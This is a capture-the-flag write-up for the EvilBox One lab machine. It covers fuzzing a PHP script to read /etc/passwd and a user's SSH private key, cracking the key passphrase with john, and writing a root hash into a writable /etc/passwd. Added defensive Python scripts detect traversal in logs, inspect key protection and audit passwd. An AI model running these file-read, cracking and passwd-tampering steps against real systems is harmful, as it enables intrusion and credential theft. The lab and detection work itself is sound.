
Vulhub - EvilBox One

EvilBox One writeup

Set up

Download the OVA file from this link and import it into Oracle VirtualBox.

Recon

First, we use the arp command to find the target's IP address

arp -a

The target's IP address is 192.168.56.101


Then we use nmap to discover open ports on the target

nmap -Pn 192.168.56.101 -sV


So the target is running Apache 2.4.38 and an SSH server is enabled. Go to http://192.168.56.101 and see the default Apache page


Use ffuf to fuzz the endpoints of Apache. The following command uses -c for colored output, -e to append a file extension to each word and -recursion to enable recursive fuzzing. I usually use the SecLists web-content wordlist.

ffuf -c -u http://192.168.56.101/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -e '.php' -recursion

Apache has the endpoint /secret, and because of the -recursion option, ffuf queues /secret for further fuzzing and finds the file evil.php under that route.


Go to /secret/evil.php; it is a blank page


Next we use ffuf to fuzz the parameters of evil.php: -X sets the request method and -fs 0 filters out responses whose size is 0

ffuf -c -u http://192.168.56.101/secret/evil.php?FUZZ=/etc/passwd -X POST -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -fs 0

and we see that evil.php accepts a request parameter named command


Open http://192.168.56.101/secret/evil.php?command=/etc/passwd in the browser and it shows the contents of passwd


RCE

With this path traversal we can use SecLists to dump sensitive files from the host. Some of those files live in a user's home directory, so first we find the current user by fuzzing for a .bashrc file

ffuf -c -u http://192.168.56.101/secret/evil.php?command=/home/FUZZ/.bashrc -w users.txt -fs 0 -v


So here we see that the user running Apache is mowree; from this we can dump the private SSH key from /home/mowree/.ssh/id_rsa
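From the defender's side, both the parameter fuzzing against evil.php and the file reads that followed leave a clear trail in the Apache access log: a burst of distinct parameter names against one script from one IP, and parameter values that are absolute paths, traversal sequences or well-known sensitive files. The script below is an added example (not part of the writeup or the EvilBox image) that runs that detection over constructed combined-format log lines; the IPs, timestamps, sizes, the user name alice and the FUZZ_THRESHOLD value are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format. Only the fields up to the response size are
# needed; the referer and user-agent at the end are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Substrings that have no business in a web request parameter value.
SENSITIVE_MARKERS = ("/etc/passwd", "/etc/shadow", "/.ssh/", "/proc/self/", ".bashrc")

# Distinct parameter names seen against one script from one IP before we call
# it parameter fuzzing. Assumed threshold for this example.
FUZZ_THRESHOLD = 5

# Constructed sample log: a normal visitor (10.0.0.7) and a scanner (10.0.0.9)
# that fuzzes parameter names and then reads files through the one that works.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /secret/evil.php?command=hello HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "POST /secret/evil.php?admin=/etc/passwd HTTP/1.1" 200 0 "-" "Fuzz Faster U Fool"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "POST /secret/evil.php?file=/etc/passwd HTTP/1.1" 200 0 "-" "Fuzz Faster U Fool"
10.0.0.9 - - [01/Jan/2024:10:01:01 +0000] "POST /secret/evil.php?id=/etc/passwd HTTP/1.1" 200 0 "-" "Fuzz Faster U Fool"
10.0.0.9 - - [01/Jan/2024:10:01:01 +0000] "POST /secret/evil.php?page=/etc/passwd HTTP/1.1" 200 0 "-" "Fuzz Faster U Fool"
10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "POST /secret/evil.php?command=/etc/passwd HTTP/1.1" 200 1398 "-" "Fuzz Faster U Fool"
10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "GET /secret/evil.php?command=..%252f..%252fetc%252fshadow HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:02:30 +0000] "GET /secret/evil.php?command=/home/alice/.ssh/id_rsa HTTP/1.1" 200 3381 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def traversal_params(target):
    """Return (name, decoded value) for query parameters that look like file reads."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; this undoes double encoding
        if ("../" in decoded or "..\\" in decoded or decoded.startswith("/")
                or any(marker in decoded for marker in SENSITIVE_MARKERS)):
            hits.append((name, decoded))
    return hits


def analyse(lines):
    """Return findings: one per request with path-like parameters, plus one per
    (ip, script) pair that was hit with many different parameter names."""
    findings = []
    param_names = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        for name, _ in parse_qsl(parts.query, keep_blank_values=True):
            param_names[(rec["ip"], parts.path)].add(name)
        hits = traversal_params(rec["target"])
        if hits:
            findings.append({
                "kind": "traversal", "ip": rec["ip"], "path": parts.path,
                "params": hits, "status": rec["status"],
                # a non-empty 200 means the requested file actually came back
                "content_returned": rec["status"] == 200 and rec["size"] > 0,
            })
    for (ip, path), names in param_names.items():
        if len(names) >= FUZZ_THRESHOLD:
            findings.append({"kind": "param_fuzzing", "ip": ip, "path": path,
                             "distinct_params": len(names)})
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG.splitlines()):
        print(finding)
```

The size field matters as much as the parameter value: ffuf's -fs 0 hides the empty responses from the attacker, and the same size-0 versus size-1398 split tells the defender which probe actually returned a file.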


Change the permissions of id_rsa to 600, then try to use this SSH private key to log in as mowree, but OpenSSH asks for the key's passphrase. Maybe we can crack it? Save id_rsa to the Kali machine and use the following commands to crack the passphrase

# create hash file from key
ssh2john id_rsa > id_rsa.hash
# crack hash
john --wordlist=darkweb2017-top10.txt id_rsa.hash


We see that the passphrase of the private key is unicorn; use it to access the target machine
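The reason a wordlist attack works here is that a leaked private key is only as strong as its passphrase and the KDF protecting it. A defender auditing home directories wants to know, without decrypting anything, whether each key is passphrase-protected and how expensive a guess is. The code below is an added example, not part of the writeup: it reads the envelope of a legacy PEM key (Proc-Type/DEK-Info headers) or a modern openssh-key-v1 key (cipher, KDF and bcrypt rounds from the binary header) and reports why a key would be cheap to attack offline. The key envelopes it checks are constructed in the block and contain no real key material; the minimum-rounds threshold is an assumption.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"
MIN_BCRYPT_ROUNDS = 16  # assumed minimum for this example (ssh-keygen's default is 16)


def _ssh_string(data):
    """Encode bytes as an SSH 'string': 4-byte big-endian length + bytes."""
    return struct.pack(">I", len(data)) + data


def _read_string(blob, offset):
    """Decode an SSH 'string' at offset; return (bytes, next offset)."""
    (length,) = struct.unpack_from(">I", blob, offset)
    start = offset + 4
    return blob[start:start + length], start + length


def build_openssh_key(cipher, kdf, rounds=16):
    """Construct a syntactically valid openssh-key-v1 envelope with empty key
    sections. Test fixture for this example only; it holds no real key."""
    kdfopts = b""
    if kdf == b"bcrypt":
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    body = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
            + struct.pack(">I", 1) + _ssh_string(b"") + _ssh_string(b""))
    b64 = base64.b64encode(body).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed legacy PEM envelope; the body is filler, not a key.
LEGACY_ENCRYPTED_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""


def inspect_private_key(key_text):
    """Report how a private key file is protected, parsing headers only."""
    lines = [ln.strip() for ln in key_text.strip().splitlines() if ln.strip()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        return {"format": "openssh", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "kdf_rounds": rounds}
    if header.startswith("-----BEGIN ") and header.endswith(" PRIVATE KEY-----"):
        encrypted = any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines)
        dek = next((ln.split(":", 1)[1].strip() for ln in lines if ln.startswith("DEK-Info:")), None)
        return {"format": "pem", "encrypted": encrypted,
                "cipher": dek.split(",")[0] if dek else "none",
                # legacy PEM derives the key with OpenSSL's EVP_BytesToKey (MD5, one pass)
                "kdf": "EVP_BytesToKey-MD5" if encrypted else "none", "kdf_rounds": None}
    raise ValueError("unrecognised key header: " + header)


def weakness(report):
    """Explain why the key is cheap to attack offline, or None if it looks adequate."""
    if not report["encrypted"]:
        return "no passphrase: anyone who can read the file can use the key"
    if report["format"] == "pem":
        return "legacy PEM encryption: single-pass MD5 KDF makes passphrase guessing cheap"
    if report["kdf"] == "bcrypt" and report["kdf_rounds"] < MIN_BCRYPT_ROUNDS:
        return f"bcrypt rounds={report['kdf_rounds']} below assumed minimum {MIN_BCRYPT_ROUNDS}"
    return None


if __name__ == "__main__":
    for sample in (LEGACY_ENCRYPTED_PEM, build_openssh_key(b"none", b"none"),
                   build_openssh_key(b"aes256-ctr", b"bcrypt", rounds=16)):
        rep = inspect_private_key(sample)
        print(rep, "->", weakness(rep))
```

Even a key with a strong KDF is still only protected by its passphrase; the check above separates keys that need a wordlist and a long run from keys that need nothing at all.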


Privilege escalation

Use the find command to list the files that mowree has write permission to

find / -type f -writable 2>/dev/null


You see that mowree can write to /etc/passwd, so simply use openssl to generate a password hash. For example, the following command generates a hash for the password root

openssl passwd root

Put the output hash into the passwd file


and then switch to the root user with the password root

su root
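The whole escalation rests on one misconfiguration: /etc/passwd being writable by an unprivileged user, which lets a hash be placed directly in a password field so that /etc/shadow is never consulted. The audit below is an added example (not from the writeup) that checks for exactly the conditions this abuse creates: a group- or world-writable file mode, a password field that holds a hash instead of the x placeholder, an empty password field, and more than one UID 0 account. The passwd contents it runs over are constructed for the example, the hash in the tampered copy is a dummy, and audit_file is the only part that touches the real system.

```python
import os
import stat

# Constructed /etc/passwd contents for this example (not taken from the machine).
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
"""

# The same file after a hash has been written into root's password field and a
# second UID 0 account appended. The hash string is a dummy, not a real crypt hash.
TAMPERED_PASSWD = """\
root:$1$saltsalt$dummyhashvalue000000000:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
backdoor:x:0:0:backdoor:/root:/bin/bash
"""


def parse_passwd(text):
    """Split passwd text into entries; lines that do not have seven fields with
    numeric uid/gid are kept as malformed so they are reported, not dropped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        name, password, uid, gid, _gecos, home, shell = fields
        entries.append({"line": lineno, "malformed": False, "name": name,
                        "password": password, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def audit_passwd(text, mode):
    """Return (severity, message) findings for passwd content whose file
    permission bits are `mode` (as from stat.S_IMODE)."""
    findings = []
    if mode & 0o022:
        findings.append(("high", f"passwd file is group- or world-writable (mode {mode & 0o777:04o})"))
    entries = parse_passwd(text)
    for e in entries:
        if e["malformed"]:
            findings.append(("medium", f"line {e['line']}: malformed entry: {e['raw']!r}"))
        elif e["password"] == "":
            findings.append(("high", f"{e['name']}: empty password field, login needs no password"))
        elif e["password"] not in ("x", "*", "!"):
            # anything other than the shadow placeholder or a lock marker is a
            # usable hash that bypasses /etc/shadow entirely
            findings.append(("high", f"{e['name']}: password hash stored in passwd instead of shadow"))
    uid0 = [e["name"] for e in entries if not e["malformed"] and e["uid"] == 0]
    if len(uid0) > 1:
        findings.append(("high", f"multiple UID 0 accounts: {', '.join(uid0)}"))
    return findings


def audit_file(path="/etc/passwd"):
    """Audit a real passwd file on this host."""
    st = os.stat(path)
    with open(path) as fh:
        return audit_passwd(fh.read(), stat.S_IMODE(st.st_mode))


if __name__ == "__main__":
    print("clean:", audit_passwd(CLEAN_PASSWD, 0o644))
    for severity, message in audit_passwd(TAMPERED_PASSWD, 0o666):
        print(f"[{severity}] {message}")
```

Running audit_file() from a cron job or a configuration-management check catches both the precondition (the writable mode that find reported) and the after-effect (the inline hash and the extra UID 0 entry), so the box would have been flagged before and after the escalation.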


This post is licensed under CC BY 4.0 by the author.